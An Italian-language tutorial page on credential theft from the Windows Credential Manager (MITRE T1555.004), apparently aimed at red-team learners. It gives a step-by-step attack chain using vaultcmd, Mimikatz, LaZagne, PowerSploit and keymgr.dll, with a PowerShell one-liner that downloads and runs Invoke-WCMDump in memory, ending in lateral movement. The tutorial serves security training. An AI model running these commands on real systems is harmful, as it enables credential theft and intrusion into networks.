Furto Credenziali dal Credential Manager: Windows Credential Manager (T1555.004)

Il Windows Credential Manager è il componente nativo di Windows che conserva credenziali di autenticazione NTLM e Kerberos in due archivi separati: il Web Credentials locker, dedicato alle credenziali di Internet Explorer e Microsoft Edge, e il Windows Credentials locker, che ospita credenziali applicative e di rete. Entrambi memorizzano i dati in file .vcrd cifrati, accompagnati da un file Policy.vpol che contiene la chiave di decrittazione, il tutto sotto il percorso %Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\.

La tecnica T1555.004 rientra nella tattica Credential Access (TA0006), la fase della kill chain in cui l'avversario punta a sottrarre nomi utente e password per muoversi lateralmente, elevare i privilegi o mantenere la persistenza senza destare sospetti. L'abuso del Credential Manager è particolarmente insidioso perché sfrutta strumenti e API di sistema perfettamente legittimi — vaultcmd.exe, rundll32.exe, l'API CredEnumerateA — rendendo la linea tra attività amministrativa ordinaria e furto di credenziali estremamente sottile.

I numeri confermano la rilevanza operativa: 4 gruppi APT, 9 software offensivi, 1 campagna documentata e 1 mitigazione specifica compongono il panorama di questa tecnica. Gruppi con obiettivi geopolitici molto diversi — dall'Iran al Golfo Persico, dalla Russia alla Corea del Nord — hanno tutti trovato nel Credential Manager un bersaglio di alto valore a basso costo operativo.


Il primo passo in un engagement red team è capire cosa il Credential Manager conserva sulla macchina compromessa. L'esecuzione nativa più immediata sfrutta vaultcmd.exe, presente di default su qualsiasi Windows moderno. Una sequenza tipica parte dall'enumerazione dei vault disponibili e prosegue con il listing delle credenziali contenute:

vaultcmd /list

Questo comando restituisce i GUID dei locker configurati. Per ispezionare il contenuto di un vault specifico si usa:

vaultcmd /listcreds:"{GUID-vault}" /all

Se l'obiettivo è ottenere un dump più completo, Mimikatz (open source) offre il modulo vault dedicato. In una sessione con privilegi elevati:

mimikatz # vault::list mimikatz # vault::cred

Il primo mostra i vault disponibili, il secondo enumera le credenziali memorizzate con i relativi metadati. Per estrarre anche le credenziali generiche di Windows (incluse quelle RDP), il modulo lsadump e sekurlsa completano l'opera, ma restano fuori dallo scope specifico di questa tecnica.

Un approccio più discreto, particolarmente apprezzato dagli operatori che vogliono evitare di caricare binari su disco, è l'uso di Invoke-WCMDump (open source), lo stesso script PowerShell impiegato da Wizard Spider. Si carica in memoria e enumera il Credential Manager senza toccare il filesystem:

powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('<URL-Invoke-WCMDump>'); Invoke-WCMDump"

Per un assessment più ampio, LaZagne (open source) automatizza il recupero credenziali da decine di sorgenti, inclusi i Vault file:

lazagne.exe all

Il flag all esegue tutti i moduli disponibili; per limitarsi al Credential Manager si può usare il modulo windows con il sottogruppo specifico.

Un'altra tecnica di interesse è l'abuso del backup del Credential Manager tramite la DLL nativa keymgr.dll. Eseguendo:

rundll32.exe keymgr.dll,KRShowKeyMgr

si apre la GUI "Stored User Names and Passwords", da cui è possibile esportare un backup delle credenziali. In un contesto di social engineering interno o accesso RDP, questo approccio non richiede alcun tool esterno.

Infine, PowerSploit (open source) include moduli nella categoria Exfiltration capaci di estrarre oggetti credenziali dal Windows Vault. Il cmdlet Get-VaultCredential rappresenta l'opzione nativa PowerShell per ambienti dove i tool compilati sono sorvegliati.

Per la catena d'attacco in laboratorio, la sequenza consigliata è: enumerazione con vaultcmd → conferma con Invoke-WCMDump → estrazione completa con Mimikatz → verifica credenziali su target laterali con net use o Enter-PSSession.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo